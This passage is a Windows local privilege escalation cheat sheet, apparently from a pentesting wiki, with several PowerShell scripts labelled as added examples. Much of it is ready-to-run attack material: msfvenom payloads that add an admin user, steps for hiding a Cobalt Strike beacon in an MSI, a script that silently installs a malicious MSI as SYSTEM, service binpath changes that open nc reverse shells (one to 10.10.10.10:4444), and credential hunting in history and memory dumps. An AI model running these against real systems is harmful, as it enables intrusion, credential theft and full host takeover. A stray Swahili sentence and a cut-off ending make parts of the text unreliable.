Windows Local Privilege Escalation
Best tool to look for Windows local privilege escalation vectors: WinPEAS
Initial Windows Theory
Access Tokens
If you don't know what Windows Access Tokens are, read the following page before continuing:
ACLs - DACLs/SACLs/ACEs
Check the following page for more information about ACLs - DACLs/SACLs/ACEs:
Integrity Levels
If you are not familiar with integrity levels in Windows, you should read the following page before continuing:
Windows Security Controls
There are different things in Windows that could prevent you from enumerating the system, running executables, or even detecting your activities. You should read the following page and enumerate all these defense mechanisms before starting the privilege escalation enumeration:
System Info
Version info enumeration
Check if the Windows version has any known vulnerability (check also the patches applied).
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Version Exploits
This site is handy for searching out detailed information about Microsoft security vulnerabilities. The database has more than 4,700 security vulnerabilities, showing the massive attack surface that a Windows environment presents.
On the system
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (winpeas has watson embedded)
Locally with system information
Github repos of exploits:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
Environment
Any credential/juicy info saved in the env variables?
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
PowerShell History
ConsoleHost_history #Find the PATH where it is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
PowerShell Transcript files
You can learn how to turn this on at https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
#Check if enabled in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
Details of PowerShell pipeline executions are recorded, including the commands executed, command invocations, and parts of scripts. However, full execution details and output results might not be captured.
To enable this, follow the instructions in the "Transcript files" section of the documentation, opting for "Module Logging" instead of "Powershell Transcription".
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
To view the last 15 events from the PowerShell logs you can execute:
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
A complete activity and full content record of the script's execution is captured, ensuring that every block of code is documented as it runs. This process preserves a comprehensive audit trail of each activity, valuable for forensics and for analysing malicious behaviour. By documenting all activity at the time of execution, detailed insights into the process are provided.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
The logged Script Block events can be found in the Windows Event Viewer at the path: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
To view the last 20 events you can use:
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
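To see at a glance which of the three PowerShell logging controls above are enforced on the box before you start running noisy commands, here is an added PowerShell example (not part of the original page). It reads the same policy keys queried above (EnableTranscripting, EnableModuleLogging and EnableScriptBlockLogging are the value names Group Policy writes there) and pulls recent 4104 script-block events that match a keyword. One caveat: from Windows 10 onward PowerShell writes 4104 events for script blocks it considers suspicious even when the policy is not set, so an empty policy does not mean nothing is being logged.

```powershell
# Added example, not part of the original page: which PowerShell logging
# controls are enforced by policy, and what recent script-block events say.
# Built-in cmdlets only; run it from the session you are working in.

function Get-PSLoggingPolicy {
    # HKLM policies apply machine-wide, HKCU policies to this user only.
    $roots = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell',
             'HKCU:\Software\Policies\Microsoft\Windows\PowerShell'
    $checks = @(
        @{ Control = 'Transcription';      Key = 'Transcription';      Value = 'EnableTranscripting' }
        @{ Control = 'ModuleLogging';      Key = 'ModuleLogging';      Value = 'EnableModuleLogging' }
        @{ Control = 'ScriptBlockLogging'; Key = 'ScriptBlockLogging'; Value = 'EnableScriptBlockLogging' }
    )
    foreach ($c in $checks) {
        $enabled = $false; $source = ''
        foreach ($r in $roots) {
            $path = Join-Path $r $c.Key
            $v = (Get-ItemProperty -Path $path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
            if ($v -eq 1) { $enabled = $true; $source = $path; break }
        }
        # Transcripts land in OutputDirectory when set, otherwise in the user's Documents folder.
        $outDir = if ($c.Key -eq 'Transcription' -and $source) {
            (Get-ItemProperty -Path $source -Name OutputDirectory -ErrorAction SilentlyContinue).OutputDirectory
        } else { '' }
        [pscustomobject]@{ Control = $c.Control; Enabled = $enabled; Source = $source; OutputDirectory = $outDir }
    }
}

function Get-RecentScriptBlocks {
    param([string]$Pattern = 'passw', [int]$Count = 200)
    # Event 4104 carries the script text in Properties[2]; -MaxEvents bounds how far back we look.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $Count -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value
            if ($text -match $Pattern) {
                [pscustomobject]@{ Time = $_.TimeCreated; Snippet = $text.Substring(0, [Math]::Min(120, $text.Length)) }
            }
        }
}

Get-PSLoggingPolicy | Format-Table -AutoSize
Get-RecentScriptBlocks -Pattern 'passw' | Format-Table -AutoSize -Wrap
```

If Transcription shows as enabled, read the OutputDirectory column before touching anything else: everything you type from now on is being written there.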
Internet Settings
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Drives
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
You can compromise the system if the updates are not requested using httpS but http.
You start by checking if the network uses a non-SSL WSUS update by running the following in cmd:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Or the following in PowerShell:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
If you get a reply such as one of these:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
WUServer : http://xxxx-updxx.corp.internal.com:8530
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName : windowsupdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer (or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver") is equal to 1, then it is exploitable. If that last registry value is equal to 0, the WSUS entry will be ignored.
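The two registry checks above combine into one decision: only an http WUServer together with UseWUServer=1 is attackable. The following PowerShell is an added example (not from the original page) that performs that decision in one go; it uses only the registry values already named above.

```powershell
# Added example, not from the original page: decide whether the WSUS client
# configuration is attackable as described above. Two conditions are needed:
# WUServer uses plain http AND UseWUServer is 1. Either one alone is not enough.

function Test-WsusExposure {
    $wuPath = 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate'
    $auPath = Join-Path $wuPath 'AU'

    $server = (Get-ItemProperty -Path $wuPath -Name WUServer    -ErrorAction SilentlyContinue).WUServer
    $useWu  = (Get-ItemProperty -Path $auPath -Name UseWUServer -ErrorAction SilentlyContinue).UseWUServer

    # Parse the scheme instead of string-matching "http:" so "https://" is not misread.
    $scheme = ''
    if ($server) {
        try { $scheme = ([uri]$server).Scheme } catch { $scheme = 'unparseable' }
    }

    # UseWUServer=0 or missing: the WUServer entry is ignored and the client
    # talks to Microsoft Update directly, so an http WUServer alone is harmless.
    $exploitable = ($scheme -eq 'http') -and ($useWu -eq 1)

    $note = if (-not $server) { 'No WSUS policy; client uses Microsoft Update' }
            elseif ($useWu -ne 1) { 'UseWUServer is not 1; WUServer is ignored' }
            elseif ($scheme -eq 'https') { 'HTTPS: only attackable if you can add a trusted cert for the WSUS hostname (see the CVE-2020-1013 report below)' }
            else { 'Plain-http WSUS in use: MiTM update injection is possible' }

    [pscustomobject]@{
        WUServer    = $server
        Scheme      = $scheme
        UseWUServer = $useWu
        Exploitable = $exploitable
        Note        = $note
    }
}

Test-WsusExposure | Format-List
```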
To exploit these vulnerabilities you can use tools like: Wsuxploit, pyWSUS. These are MiTM weaponized exploit scripts to inject 'fake' updates into non-SSL WSUS traffic.
Read the research here:
WSUS CVE-2020-1013
Read the complete report here.
Basically, this is the flaw that this bug exploits:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
You can exploit this vulnerability using the tool WSUSpicious (once it's liberated).
KrbRelayUp
There is a local privilege escalation vulnerability in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and users have the capability to create computers within the domain. It is important to note that these requirements are met using default settings.
Find the exploit in https://github.com/Dec0ne/KrbRelayUp
For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If these 2 registry values are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
If you have a meterpreter session you can automate this technique using the module exploit/windows/local/always_install_elevated
PowerUP
Use the Write-UserAddMSI command from power-up to create inside the current directory a Windows MSI binary to escalate privileges. This script writes out a precompiled MSI installer that prompts for a user/group addition (so you will need GUI access):
Write-UserAddMSI
Just execute the created binary to escalate privileges.
MSI Wrapper
Read this tutorial to learn how to create an MSI wrapper using these tools. Note that you can wrap a ".bat" file if you just want to execute command lines.
Create MSI with WIX
Create MSI with Visual Studio
- Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe
- Open Visual Studio, select Create a new project and type "installer" into the search box. Select the Setup Wizard project and click Next.
- Give the project a name, like AlwaysPrivesc, use C:\privesc for the location, select place solution and project in the same directory, and click Create.
- Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.
- Highlight the AlwaysPrivesc project in the Solution Explorer and in the Properties, change TargetPlatform from x86 to x64.
- There are other properties you can change, such as Author and Manufacturer, which can make the installed app look more legitimate.
- Right-click the project and select View > Custom Actions.
- Right-click Install and select Add Custom Action.
- Double-click on Application Folder, select your beacon.exe file and click OK. This will ensure that the beacon payload is executed as soon as the installer is run.
- Under the Custom Action Properties, change Run64Bit to True.
- Finally, build it.
- If the warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' is shown, make sure you set the platform to x64.
MSI Installation
To execute the installation of the malicious .msi file in the background:
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
To exploit this vulnerability you can use: exploit/windows/local/always_install_elevated
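Added example (not from the original page) putting the check and the installation step together in PowerShell. It only proceeds when the value is 1 in both HKLM and HKCU, which is the mistake most often made with this check, and returns the msiexec exit code. The MSI path is an assumption; point it at an installer you built, for example with the msfvenom command above.

```powershell
# Added example, not from the original page: AlwaysInstallElevated is only
# exploitable when the policy value is 1 in BOTH HKLM and HKCU; a hit in just
# one hive is a false positive. If both are set, run msiexec silently on the
# supplied MSI. $MsiPath is an assumption: use an MSI you built yourself.

function Test-AlwaysInstallElevated {
    $sub = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $state = @{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $state[$hive] = (Get-ItemProperty -Path "${hive}:\$sub" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    [pscustomobject]@{
        HKLM        = $state['HKLM']
        HKCU        = $state['HKCU']
        Exploitable = ($state['HKLM'] -eq 1) -and ($state['HKCU'] -eq 1)
    }
}

function Invoke-ElevatedMsi {
    param([Parameter(Mandatory)][string]$MsiPath)
    $check = Test-AlwaysInstallElevated
    if (-not $check.Exploitable) {
        Write-Warning "AlwaysInstallElevated not set in both hives (HKLM=$($check.HKLM), HKCU=$($check.HKCU))"
        return $check
    }
    # /i install, /qn no UI, /norestart avoids a surprise reboot. Exit 0 = success;
    # 1603 = fatal error, which is common for msfvenom MSIs that deliberately fail
    # after their custom action has already run the payload as SYSTEM.
    $p = Start-Process -FilePath msiexec.exe -ArgumentList "/i `"$MsiPath`" /qn /norestart" -Wait -PassThru
    [pscustomobject]@{ MsiPath = $MsiPath; ExitCode = $p.ExitCode }
}

Test-AlwaysInstallElevated
# Invoke-ElevatedMsi -MsiPath 'C:\Users\Public\alwe.msi'   # assumption: path to your MSI
```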
Antivirus and Detectors
Audit Settings
These settings decide what is being logged, so you should pay attention
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding: it is interesting to know where the logs are sent
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS is designed for the management of local Administrator passwords, ensuring that each password is unique, randomised, and regularly updated on computers joined to a domain. These passwords are stored securely within Active Directory and can only be accessed by users who have been granted sufficient permissions through ACLs, allowing them to view local admin passwords if authorised.
WDigest
If active, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential
LSA Protection
Starting with Windows 8.1, Microsoft introduced enhanced protection for the Local Security Authority (LSA) to block attempts by untrusted processes to read its memory or inject code, further securing the system.
More info about LSA Protection here.
reg query "HKLM\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL
Credentials Guard
Credential Guard was introduced in Windows 10. Its purpose is to safeguard the credentials stored on a device against threats like pass-the-hash attacks. More info about Credentials Guard here.
reg query "HKLM\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags
Cached Credentials
Domain credentials are authenticated by the Local Security Authority (LSA) and used by operating system components. When a user's logon data is authenticated by a registered security package, domain credentials for the user are typically established.
More info about Cached Credentials here.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT
Users & Groups
Enumerate Users & Groups
You should check if any of the groups you belong to have interesting permissions
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Privileged groups
If you belong to some privileged group you may be able to escalate privileges. Learn about privileged groups and how to abuse them to escalate privileges here:
Token manipulation
Learn more about what a token is on this page: Windows Tokens.
Check the following page to learn about interesting tokens and how to abuse them:
Logged users / Sessions
qwinsta
klist sessions
Home folders
dir C:\Users
Get-ChildItem C:\Users
Password Policy
net accounts
Get the content of the clipboard
powershell -command "Get-Clipboard"
Running Processes
File and Folder Permissions
First of all, when listing the processes check for passwords inside the command line of the process.
Check if you can overwrite some running binary or if you have write permissions on the binary's folder to exploit possible DLL Hijacking attacks:
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Always check for possible electron/cef/chromium debuggers running; you could abuse them to escalate privileges.
Checking permissions of the processes binaries
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
Checking permissions of the folders of the processes binaries (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
Memory Password mining
You can create a memory dump of a running process using procdump from sysinternals. Services like FTP have the credentials in clear text in memory; try to dump the memory and read the credentials.
procdump.exe -accepteula -ma <proc_name_tasklist>
Insecure GUI apps
Applications running as SYSTEM may allow a user to spawn a CMD or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
Services
Get a list of services:
net start
wmic service list brief
sc query
Get-Service
Permissions
You can use sc to get information about a service
sc qc <service_name>
It is recommended to have the binary accesschk from Sysinternals to check the required privilege level for each service.
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
It is recommended to check if "Authenticated Users" can modify any service:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
You can download accesschk.exe for XP here
Enable service
If you are having this error (for example with SSDPSRV):
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
You can enable it using
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Take into account that the service upnphost depends on SSDPSRV to work (for XP SP1)
Another workaround for this problem is running:
sc.exe config usosvc start= auto
Modify service binary path
If the "Authenticated users" group has SERVICE_ALL_ACCESS on a service, it can modify the binary the service executes. To modify it and execute it with sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Restart service
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Note that a binary that is not a real service (nc.exe, net.exe, cmd.exe) never reports back to the Service Control Manager, so the start will fail with error 1053 after a timeout; the command has still been executed as the service account by then.
Privileges can be escalated through various permissions:
- SERVICE_CHANGE_CONFIG: Allows reconfiguration of the service binary.
- WRITE_DAC: Enables permission reconfiguration, leading to the ability to change service configurations.
- WRITE_OWNER: Permits ownership acquisition and permission reconfiguration.
- GENERIC_WRITE: Inherits the ability to change service configurations.
- GENERIC_ALL: Also inherits the ability to change service configurations.
For the detection and exploitation of this vulnerability, the exploit/windows/local/service_permissions module can be used.
Services binaries weak permissions
Check if you can modify the binary that is executed by a service or if you have write permissions on the folder where the binary is located (DLL Hijacking).
You can get every binary that is executed by a service using wmic (not in system32) and check your permissions using icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
Unaweza pia kutumia sc na icacls:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Services registry modify permissions
You should check if you can modify any service registry key.
You can check your permissions over a service registry key doing:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
It should be checked whether Authenticated Users or NT AUTHORITY\INTERACTIVE possess FullControl permissions. If so, the binary executed by the service can be altered.
To change the Path of the binary executed:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
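Rather than round-tripping reg save/reg restore on every key, the following added PowerShell example (not from the original page) reads the DACL of each service key and reports the ones where a SID in the current token holds SetValue (enough to rewrite ImagePath) or CreateSubKey (the AppendData/AddSubdirectory case covered next). Generic access rights in an ACE (for example GENERIC_ALL) are not expanded, so treat a clean result as a hint rather than proof.

```powershell
# Added example, not from the original page: service keys whose DACL grants a
# SID in the current token SetValue (rewrite ImagePath) or CreateSubKey
# (the AppendData/AddSubdirectory case). Generic rights are not expanded.

$id   = [Security.Principal.WindowsIdentity]::GetCurrent()
$sids = @($id.User) + @($id.Groups)                         # SIDs present in our token
$setValue  = [int][System.Security.AccessControl.RegistryRights]::SetValue
$createSub = [int][System.Security.AccessControl.RegistryRights]::CreateSubKey

function Get-WritableServiceKey {
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        try { $acl = Get-Acl -LiteralPath $key.PSPath -ErrorAction Stop } catch { return }
        $canSet = $false; $canSub = $false
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try { $aceSid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]) } catch { continue }
            if ($sids -notcontains $aceSid) { continue }
            $rights = [int]$ace.RegistryRights                  # FullControl includes both bits below
            if (($rights -band $setValue)  -ne 0) { $canSet = $true }
            if (($rights -band $createSub) -ne 0) { $canSub = $true }
        }
        if ($canSet -or $canSub) {
            [pscustomobject]@{
                Service     = $key.PSChildName
                ImagePath   = (Get-ItemProperty -LiteralPath $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                CanSetValue = $canSet    # reg add ... /v ImagePath works; the service runs your binary on next start
                CanSubKey   = $canSub    # you can create Performance/Parameters subkeys under the service
            }
        }
    }
}

Get-WritableServiceKey | Format-Table -AutoSize
```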
Services registry AppendData/AddSubdirectory permissions
If you have this permission over a registry key this means you can create sub registry keys from this one. In the case of Windows services this is enough to execute arbitrary code:
AppendData/AddSubdirectory permission over service registry
Unquoted Service Paths
If the path to an executable is not inside quotes, Windows will try to execute every ending before a space.
For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
List all unquoted service paths, excluding those belonging to built-in Windows services:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services
# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
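The icacls loops above and the unquoted-path one-liners check three related conditions separately. The following PowerShell is an added example (not from the original page) that does all three in one pass over Win32_Service: whether the service binary is writable, whether its directory is writable (binary drop or DLL hijacking), and, for unquoted paths with spaces, whether any of the intermediate C:\Program.exe-style locations can be planted. ACEs are matched against the SIDs in the current token, so group grants (Users, Authenticated Users, Everyone) are honoured; deny ACEs and generic access masks are not modelled.

```powershell
# Added example, not from the original page: one pass over all services that
# flags (1) a writable service binary, (2) a writable binary directory (drop a
# DLL or replace the binary), and (3) an unquoted path with spaces whose
# intermediate C:\Program.exe-style location is writable. ACEs are matched
# against the SIDs in our token; deny ACEs and generic masks are not modelled.

$id   = [Security.Principal.WindowsIdentity]::GetCurrent()
$sids = @($id.User) + @($id.Groups)
$writeMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership)

function Test-Writable([string]$Path) {
    # True when an Allow ACE for one of our SIDs carries a write/delete/DAC bit.
    if (-not $Path) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $aceSid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]) } catch { continue }
        if (($sids -contains $aceSid) -and ((([int]$ace.FileSystemRights) -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

function Get-UnquotedCandidates([string]$PathName) {
    # 'C:\Program Files\Some Folder\svc.exe' -> C:\Program.exe, 'C:\Program Files\Some.exe'
    if ($PathName -match '^"' -or $PathName -notmatch ' ') { return @() }
    $exe   = ($PathName -split ' (?=[-/])')[0]          # strip " -arg" / " /arg" style arguments
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Get-ServiceWeakness {
    Get-CimInstance Win32_Service | ForEach-Object {
        $raw = $_.PathName
        if (-not $raw) { return }
        $exe = if ($raw -match '^"([^"]+)"') { $Matches[1] } else { ($raw -split ' -|\s/')[0] }
        $dir = Split-Path -Path $exe -Parent -ErrorAction SilentlyContinue
        $drops = Get-UnquotedCandidates $raw | Where-Object { Test-Writable (Split-Path -Path $_ -Parent) }
        [pscustomobject]@{
            Name           = $_.Name
            StartMode      = $_.StartMode
            RunAs          = $_.StartName
            BinaryWritable = Test-Writable $exe
            DirWritable    = Test-Writable $dir
            UnquotedDrop   = ($drops -join ';')
        }
    } | Where-Object { $_.BinaryWritable -or $_.DirWritable -or $_.UnquotedDrop }
}

Get-ServiceWeakness | Format-Table -AutoSize
```

Read the RunAs and StartMode columns together with the finding: a writable binary for a service that runs as LocalSystem and starts automatically is a reboot (or a restart right you also hold) away from SYSTEM; one that runs as a low-privileged virtual account buys much less.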
You can detect and exploit this vulnerability with metasploit: exploit/windows/local/trusted_service_path
You can manually create a service binary with metasploit:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
Recovery Actions
Windows allows users to specify actions to be taken if a service fails. This feature can be configured to point to a binary. If this binary is replaceable, privilege escalation might be possible. More details can be found in the official documentation.
Applications
Installed Applications
Check permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders (DLL Hijacking).
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Write Permissions
Check if you can modify some config file to read some special file or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).
A way to find weak folder/file permissions in the system is doing:
